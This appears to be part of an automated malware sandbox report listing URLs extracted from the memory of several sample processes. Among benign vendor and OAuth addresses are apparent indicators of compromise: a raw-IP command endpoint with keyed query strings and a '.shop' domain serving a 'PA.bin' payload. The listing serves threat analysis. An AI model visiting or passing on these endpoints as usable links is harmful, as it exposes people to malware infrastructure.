                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/plugins/#SSLOauth2
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/plus-pack/
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/pro/
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/pro/http://www.esumsoft.com/products/pop-peeper/plus-pac
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/versionhistory/
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/versionhistory/H?g
                    Source: DrjfIAN86u.tmp, DrjfIAN86u.tmp, 00000004.00000002.2571921376.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Qv4wdsLMG.exe, 00000006.00000003.1607274156.0000000002360000.00000004.00001000.00020000.00000000.sdmp, Qv4wdsLMG.exe, 00000006.00000003.1608813193.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Qv4wdsLMG.tmp, 00000007.00000000.1610799103.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.innosetup.com/
                    Source: DrjfIAN86u.exe, 00000003.00000003.1536343641.0000000002118000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000003.1535667671.0000000002440000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, DrjfIAN86u.tmp, 00000004.00000002.2571921376.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Qv4wdsLMG.exe, 00000006.00000003.1607274156.0000000002360000.00000004.00001000.00020000.00000000.sdmp, Qv4wdsLMG.exe, 00000006.00000003.1608813193.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Qv4wdsLMG.tmp, 00000007.00000000.1610799103.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.remobjects.com/ps
                    Source: DrjfIAN86u.exe, 00000003.00000003.1536343641.0000000002118000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000003.1535667671.0000000002440000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000002.2571921376.0000000000401000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.remobjects.com/psU
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/order
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/winhex/license
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/winhex/subscribe
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/1
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/T
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/UH
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A53000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033AC000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c802a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c812a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c822a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c832a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c842a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c852a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c862a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c872a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8c2a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8d2a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d802a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d842a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d852a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2575523395.0000000003429000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d862a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d872a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f832a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6547ad12dac0290cf
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f8c2a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f8d2a1cec7a86d87bdb6546ad12dac02909e
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/crosoft
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/n
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/nd-point:
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ows
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/p
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.39.17.76/ptography
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.login.aol.com/oauth2/get_token
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.login.aol.com/oauth2/request_auth
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.login.yahoo.com/oauth2/get_token
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.login.yahoo.com/oauth2/request_auth
                    Source: svchost015.exe, 00000001.00000003.1705567580.0000000003A74000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://autoconfig.thunderbird.net/v1.1/
                    Source: svchost015.exe, 00000001.00000003.1705567580.0000000003A74000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://autoconfig.thunderbird.net/v1.1//mail/config-v1.1.xmlhttp://autoconfig.incomingServer//#=ema
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://data.esumsoft.com/PPThemes/Themes.zip
                    Source: Qv4wdsLMG.tmp, 00000009.00000003.1659044735.0000000005C50000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2574033063.000000006BB1A000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                    Source: Qv4wdsLMG.tmp, 00000009.00000003.1659044735.0000000005C50000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2574033063.000000006BB1A000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportxA
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/tesseract-ocr/tessdata/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.sh
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shal
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shop/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shop/PA.bin
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shop/PA.binheckedl3
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shop/w
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2183001059.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206946004.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.passionwhenever.shop:443/PA.binofD
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclient
